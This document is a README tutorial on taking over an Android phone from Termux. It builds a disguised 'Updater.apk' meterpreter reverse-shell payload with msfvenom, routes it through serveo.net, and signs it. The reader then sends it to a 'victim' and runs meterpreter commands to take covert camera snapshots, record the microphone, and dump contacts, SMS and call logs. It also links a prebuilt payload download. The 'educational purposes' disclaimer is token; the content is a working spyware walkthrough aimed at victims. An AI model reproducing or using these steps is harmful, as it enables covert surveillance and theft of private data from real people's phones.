# How-to-Hack-Android-Device-using-Termux

<p align="center"> 
<img src="1.jpg">
</p>

This Thread is O.N.L.Y for Education Purposes. I will not be Responsible of Any Negative and Illegal use of this information. Try not to HACK the Androids, other than your's. Or you will be in PRISON. Only Use this information for testing purposes.

## Requirements

1) Android 5.0 or more

2) TermuX Android App

3) Installed Metasploit Framework in TermuX [Tutorial Here](https://null-byte.wonderhowto.com/forum/install-metasploit-framework-termux-android-0186792/)

4) Active Internet/WiFi Connection

5) TermuX should be allowed to use External Storage (For this only enter this command only at once: "termux-setup-storage")

6) MiXplorer (For signing APK file, Download it from UpToDown Website)

7) MiX Signer (APK Signer for MiXplorer, Download it from Play Store)

8) (Recommended) Use Hacker's Keyboard for entering commands in TermuX easily.

## Step 1: Port Forwarding
Many People use NGROK for Port Forwarding. But in NGROK, you can see that it always generates a new Domain or Port when you Re-connect to it. Reserved Domain and Port is Unfortunately only available for PAID or their Premium Costumers. That is why, for NGROK you have to generate a new APK file every time you start hacking.
BUT HERE... we are gonna use [Serveo](https://serveo.net/). In Serveo, you can manually forward your desired port on Internet (and can forward it again in future). To use Serveo Port Forwarding, you have to install OpenSSH package for TermuX. For this, enter this command in TermuX:

```pkg install openssh```
> It will successfully install OpenSSH

After installation, just type this:

```ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net```
> Detail Below

* It may ask you about default ssh or something like this. Just type "yes" when it ask about it.

* Here, you have to keep some points in mind; IF you want to forward an __HTTP Port__, then select different ports in both "Desired_Port" fields. But here we gonna forward a __TCP port__. To forward TCP port, you have to enter same, desired ports in "Desired_Ports" field. Also, do not change "localhost". Here we are going to Forward a TCP port: 4564 (just for an example). After forwarding port, it may look like this:

<p align="center"> 
<img src="2.jpg">
</p>

* (Optional) Name this session: Port Forwarding

## Step 2: Creating APK File with Embedded Payload
* To create APK File with Embedded Payload, enter this command in NEW SESSION:

``` msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R ```  
``` > storage/downloads/Updater.apk ```  
> Link for Updater.apk is in next 3rd Paragraph

<p align="center"> 
<img src="3.jpg">
</p>

* Wait for a minute...

<p align="center"> 
<img src="4.jpg">
</p>

* Alright... Now the APK file with Embedded payload is successfully generated here: Phone/SD-Card Storage -> downloads -> Updater.apk

* (OPTIONAL) You can use [APK Editor Pro](https://apkpure.com/apk-editor-pro/com.heagoo.apkeditor) , to change the name (Default: MainActivity), and Version of the generated APK file.
Note:- If you are not able to generate APK file, then download it from here :
[mega.nz/#!uo9wSQRA!7_TqR8JqY_NJWZADNNZYEiBL1Imh1PvSrtK216m6uBc](https://mega.nz/#!uo9wSQRA!7_TqR8JqY_NJWZADNNZYEiBL1Imh1PvSrtK216m6uBc)

(Remember: This APK File in not signed! You have to sign it before using, to avoid problems).

## Step 3: Signing Newly Generated APK File
To sign the newly generated APK File,

* Open __MiXplorer File Manager__ and head to __"Un-Signed APK File (Updater.apk)"__ (will be located in downloads folder).

<p align="center"> 
<img src="5.jpg">
</p>

* Long Press on __"Un-Signed APK File (Updater.apk)"__ and select __"MENU button"__ on top right corner of MiXplorer, then select __"SIGN"__.

<p align="center"> 
<img src="6.jpg">
</p>

* It will display variety of options to sign APK File (but "AUTO" is preferred).

* Select __"AUTO"__ to Automatically & Successfully sign the APK file.

<p align="center"> 
<img src="7.jpg">
</p>

* Now, your APK file: __(filename)-signed.apk__ is successfully signed and fully functional also is of __9.9KB__ of size.

<p align="center"> 
<img src="8.jpg">
</p>

* For more information about signing apk file, visit this tutorial: [Sign the APK File with Embedded Payload (The Ultimate Guide)](https://null-byte.wonderhowto.com/forum/to-sign-apk-file-with-embedded-payload-the-ultimate-guide-updated-0186656/)

## Step 4: Setup Metasploit in TermuX
* Activate Metasploit Framework in TermuX by entering this command in new session:
```msfconsole```  
> Metasploit Framework Console

__Note(1):-__ If you have not installed Metasploit-Framework in your TermuX app yet, then follow This Tutorial: [Install Metasploit Framework in TermuX on Android](https://null-byte.wonderhowto.com/forum/to-install-metasploit-framework-termux-android-0186792/)

__Note(2):-__ If you are getting this error: Failed to connect to the database , as shown in the below screenshot, enter the following commands in NEW SESSION (Unfortunately You may have to enter these commands every time you open TermuX (in a separate session) . But fortunately entering no such (following) commands, will not affect your Hacking! That`s why, I`m ignoring this error :) :

```mkdir -p $PREFIX/var/lib/postgresql```    
```initdb $PREFIX/var/lib/postgresql```  
```pg_ctl -D $PREFIX/var/lib/postgresql start```  
> Thanks to DUST WORLD, for this fix ...!!!

<p align="center"> 
<img src="9.jpg">
</p>

* Wait for a min...

<p align="center"> 
<img src="10.jpg">
</p>

* Now, When the msfconsole starts, type the following (Bolded) commands one by one carefully:

```msf> use exploit/multi/handler```  
```msf> set payload android/meterpreter/reverse_tcp```  
```msf> set LHOST localhost```  
```msf> set LPORT 4564```  
```msf> exploit -j -z```  
> Enter only BOLDED commands

<p align="center"> 
<img src="11.jpg">
</p>

## Step 5: Installing APK in Victim's Android Device
* Now, Send the Payload-Signed.apk file into your victim`s android device (e.g. via Bluetooth is Recommended) -> Install it -> then open it (Make sure that the victim`s device has an active internet connection).

*After opening APK file in victim's phone, you will see that Meterpreter Session in your Metasploit field will be activated. To open the Meterpreter session of your victim's device, click __"Return Button"__ and enter this Command in Metasploit session:

```sessions -i (Session ID)```  
> (Session ID) = 1 , 2 , 3 , 4 or 5 ...

<p align="center"> 
<img src="12.jpg">
</p>

* In __(Session ID)__ , select the session number of Meterpreter (i.e. You will see this message when your victim opens the APK file: __Meterpreter Session Opened 1__ , here , 1 is the session id of Meterpreter Session).

* If you see the following window, then

<p align="center"> 
<img src="13.jpg">
</p>

* BINGO.......!!!!!!!! You have successfully hacked your Victim`s Android Device

__!!!...Need Some Help While Hacking...???__
You can enter: {meterpreter> __help__} command, for all the available commands, here, I've simplified some commands for you.

* ___Taking Stealth Snapshot from Front Camera___
Just enter this command for this:

```webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg```  

Here, in this command, __2__ is representing the front camera. For Back camera, you have to use __1__.

Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-F.jpg

* __Taking Stealth Snapshot from Rear Camera__

Just as the above, but this time, we will use 1,

```webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg```  

Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-R.jpg

* __Fetching All Contacts__

To fetch contacts, just enter this command:

```dump_contacts -o storage/downloads/X-Contacts.txt```  

Conacts will be saved in : (Default Write Storage) -> downloads -> X-Contacts.txt

* __Fetching All SMS__
Just like above,

```dump_sms -o storage/downloads/X-SMS.txt```  

All the SMS will be saved in : (Default Write Storage) -> downloads -> X-SMS.txt

* __Fetching Call Log__
Just enter this:

```dump_calllog -o storage/downloads/X-CallLog.txt```  

Call Log will be saved in : (Default Write Storage) -> downloads -> X-CallLog.txt

* __Spying Through Microphone__
Here, you have to edit the duration of the recording microphone (default: 1s). Command for 10 seconds recording is this:

```record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3```  

Spy Recording will be saved in : (Default Write Storage) -> downloads -> X-Spy-Record.mp3

__???...Common Problems...???__
* __Metasploit not running on TermuX__
This might happen, if you do anything wrong in installing TermuX on android. If you see error like GEMS not found, or any this kind of error, simply Delete TermuX with its data, and reinstall it.

* __msfvenom/msfconsole : command not found!__
There are two possible reasons for that error.

__1)__ Metasploit is not properly installed on TermuX. That's why, it was unable to create Command Shortcut. To fix this, uninstall the TermuX, with Data. Then reinstall TermuX and repeat all the Method again. This is actually a script error. I also faced this problem on first time installing Metasploit in TermuX!

__2)__ Metasploit is successfully installed, but was unable to create the shortcut. To manage this, just enter:

* Manual Way
Just open a New Session and go to metasploit-framework directory, and enter ./msfconsole command, Like This (same for msfvenom):

```cd metasploit-framework```  
```./msfconsole```  
__OR__  
```./msfvenom```  
> 1st command will take U 2 the MSF Directory, and 2nd 1 is 2 start MSF.

__3)__ Shortcut Method

Those people who are not satisfied with the first one, and want to create a shortcut command, as the other programs set, enter the following commands one by one in a new session (msfvenom included):

```ln -s /data/data/com.termux/files/home/metasploit-framework/msfconsole```  
```mv msfconsole $PREFIX/bin```  

```ln -s /data/data/com.termux/files/home/metasploit-framework/msfvenom```  
```mv msfvenom $PREFIX/bin```  
> This process is also called Symlinking [Updated]

__4)__ Still no luck (with msfvenom)!? , I've uploaded [Updater.apk](https://mega.nz/#!uo9wSQRA!7_TqR8JqY_NJWZADNNZYEiBL1Imh1PvSrtK216m6uBc) with default (LHOST=serveo.net , LPORT=4564) settings. Download it from there.

* __Why we use serveo.net ...?__

As I told before, NGROK does not provede a fixed Domain and Port. So, you have to generate a new APK file, when you plan to hack a phone, you hacked before. See what serveo says about NGROK:

<p align="center"> 
<img src="14.jpg">
</p>

* __Why we are using MiXplorer for Signing the APK File ...?__

Actually, there is no Other way to sign the APK file on Android. Otherwise, You have to sign the APP file in Your PC (Specially in Kali LinuX). MiXplorer is the Excellent way to sign the APK file, directly in Android.

* __Metasploit Error: Failed to connect to the Database__

<p align="center"> 
<img src="15.jpg">
</p>

Don't worry about it. We have already made a solution for this :) . I think you have noticed earlier , that I was using "localhost" , instead of 127.0.0.1 or :::0:1 , as HOST. Actually, the "localhost" command automatically connects you to the available Local Host, no matter if it is 127.0.0.1 or :::0.1 or else.

But if you still want to fix it, enter the following commands in New Session of TermuX carefully:

```mkdir -p $PREFIX/var/lib/postgresql```  
```initdb $PREFIX/var/lib/postgresql```  
```pg_ctl -D $PREFIX/var/lib/postgresql start```  
> Thanks to Dusty World for this FIX

* __Which Android Phone is best for H4ck1nG Purposes ...?__

__1)__ Google NeXuS phones/Tablets are Excellent for Hack1nG Purposes. As, they completely supports Kali NetHunter. NetHunter includes all the tools for hacking, and it works as an Android/Windows on a Tablet.

__2)__ But if we talk about Android, Many H4ck3Rs say that Samsung Galaxy S5 is Excellent for Ha4ck1nG Purposes. It has a good Android Version (around 5.0), also Fully supports the TermuX Application.

## Note:-This information is for Educational Purposes Only. I'll not be responsible of any Negative or Illegal use of this information. 
